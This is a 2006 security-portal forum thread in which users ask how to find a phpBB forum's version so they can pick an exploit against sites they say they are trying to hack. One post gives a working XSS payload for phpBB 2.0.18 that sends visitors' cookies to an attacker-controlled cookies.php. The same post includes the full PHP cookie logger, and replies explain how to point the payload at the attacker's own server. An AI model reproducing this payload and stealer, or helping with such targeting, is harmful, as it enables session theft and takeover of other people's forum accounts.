Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 682
Members: 0
Total: 682
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to find out PHPBB version.
Post new topic  Reply to topic View previous topic :: View next topic 
How to find out PHPBB version.
PostPosted: Fri Apr 07, 2006 12:31 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Ok, So I have the site I have the exploits but I dont know which to use.

How do I find out which version they have. Shocked
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:33 pm Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:11 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Cheers man, works like a teapot.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:16 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Ok, Now this forum has a 2.0.18.

Therefore, I use this:

Quote:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


Could someone just tell me what bits I change.

Thanks. Very Happy
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:27 pm Reply with quote
Aryan-Husky
Active user
Active user
 
Joined: Apr 03, 2006
Posts: 37




Check previous post, the only think to change is the location of your server, I also think your target phpBB needs to have html set to on.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 4:21 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Do I change the server to MY website or the 'enemys' website host.

If its the person im trying to hack, how do I get their server details? Shocked
View user's profile Send private message
PostPosted: Wed May 10, 2006 10:10 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
 
Joined: May 11, 2006
Posts: 5




sljyro wrote:
http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL


This doesn't seem to work on the forum i'm trying to gain access to. Any1 have any other ideas besides this one, /docs/INSTALL.html?
View user's profile Send private message
PostPosted: Thu May 11, 2006 6:18 pm Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




well theres a flaw with that, the use might have updated the forum, but not the docs, which happens in many cases. so that way is never 100%.

if it doesnt work (and you are sure its a phpBB and putting the correct url), there's a possibility the user has moved/deleted the docs folder from the server.
View user's profile Send private message
PostPosted: Thu May 11, 2006 7:07 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
 
Joined: May 11, 2006
Posts: 5




Yeah, i'm sure i typed it correctly and it is a phpBB forum. I tried it on another site and it worked.

The site was revamped to a phpBB forum Jan this year so culd that determine what version they're running?
View user's profile Send private message
PostPosted: Thu May 11, 2006 10:20 pm Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




if its jan, could be a 2.0.18 or .19
View user's profile Send private message
PostPosted: Fri May 12, 2006 4:54 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
 
Joined: May 11, 2006
Posts: 5




Ah, thanx for da help dude.
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 7:58 pm Reply with quote
superninja
Active user
Active user
 
Joined: Jul 03, 2006
Posts: 38




Where it says what version is? Embarassed
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 9:51 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




superninja wrote:
Where it says what version is? Embarassed


Take a good look at changelog and you will see, what is the latest version, described Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 26, 2006 12:38 am Reply with quote
VanVip
Beginner
Beginner
 
Joined: Nov 21, 2005
Posts: 4




hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?
View user's profile Send private message
PostPosted: Thu Jul 27, 2006 12:40 pm Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




VanVip wrote:
hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?


try docs

and not doc
View user's profile Send private message
How to find out PHPBB version.
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.176 Seconds